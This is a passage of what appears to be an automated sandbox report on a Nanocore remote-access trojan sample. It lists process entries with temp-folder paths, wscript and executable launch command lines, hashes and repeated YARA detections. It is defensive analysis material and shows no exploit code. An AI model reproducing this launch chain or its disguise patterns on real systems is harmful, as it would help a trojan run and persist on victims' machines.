          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff7fcd70000
          File size:625664 bytes
          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language

          General

          Target ID:13
          Start time:08:10:21
          Start date:02/02/2023
          Path:C:\Windows\System32\wscript.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs"
          Imagebase:0x7ff60c2e0000
          File size:163840 bytes
          MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language

          General

          Target ID:16
          Start time:08:10:24
          Start date:02/02/2023
          Path:C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
          Imagebase:0x310000
          File size:936754 bytes
          MD5 hash:8A57722EC9067FAAA9FF2980C5F02838
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

          General

          Target ID:17
          Start time:08:10:33
          Start date:02/02/2023
          Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
          Wow64 process (32bit):true
          Commandline:"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe"
          Imagebase:0x840000
          File size:45152 bytes
          MD5 hash:2867A3817C9245F7CF518524DFD18F28
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:.Net C# or VB.NET

          General

          Target ID:18
          Start time:08:10:33
          Start date:02/02/2023
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff7fcd70000
          File size:625664 bytes
          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language

          General

          Target ID:19
          Start time:08:10:34
          Start date:02/02/2023
          Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
          Imagebase:0x910000
          File size:45152 bytes
          MD5 hash:2867A3817C9245F7CF518524DFD18F28
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:.Net C# or VB.NET
          Yara matches:
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, Author: unknown

          General

          Target ID:20
          Start time:08:10:40
          Start date:02/02/2023
          Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
          Imagebase:0x9c0000
          File size:45152 bytes
          MD5 hash:2867A3817C9245F7CF518524DFD18F28
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:.Net C# or VB.NET

          General

          Target ID:21
          Start time:08:10:41
          Start date:02/02/2023
          Path:C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
          Imagebase:0x310000
          File size:936754 bytes
          MD5 hash:8A57722EC9067FAAA9FF2980C5F02838
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

          General

          Target ID:22
          Start time:08:10:50
          Start date:02/02/2023
          Path:C:\Windows\System32\wscript.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs"
          Imagebase:0x7ff60c2e0000
          File size:163840 bytes
          MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language

          General

          Target ID:23
          Start time:08:10:55
          Start date:02/02/2023
          Path:C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
          Imagebase:0x310000
          File size:936754 bytes
          MD5 hash:8A57722EC9067FAAA9FF2980C5F02838
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

          General

          Target ID:24
          Start time:08:11:00
          Start date:02/02/2023
          Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
          Imagebase:0x6f0000
          File size:45152 bytes
          MD5 hash:2867A3817C9245F7CF518524DFD18F28
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:.Net C# or VB.NET

          General

          Target ID:25
          Start time:08:11:04
          Start date:02/02/2023
          Path:C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
          Imagebase:0x310000
          File size:936754 bytes
          MD5 hash:8A57722EC9067FAAA9FF2980C5F02838
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

          General

          Target ID:26
          Start time:08:11:11
          Start date:02/02/2023
          Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
          Imagebase:0x6c0000
          File size:45152 bytes
          MD5 hash:2867A3817C9245F7CF518524DFD18F28
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:.Net C# or VB.NET

          General

          Target ID:27
          Start time:08:11:13
          Start date:02/02/2023
          Path:C:\Windows\System32\wscript.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs"
          Imagebase:0x7ff60c2e0000
          File size:163840 bytes
          MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language

          General

          Target ID:28
          Start time:08:11:16
          Start date:02/02/2023
          Path:C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
          Imagebase:0x310000
          File size:936754 bytes
          MD5 hash:8A57722EC9067FAAA9FF2980C5F02838
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
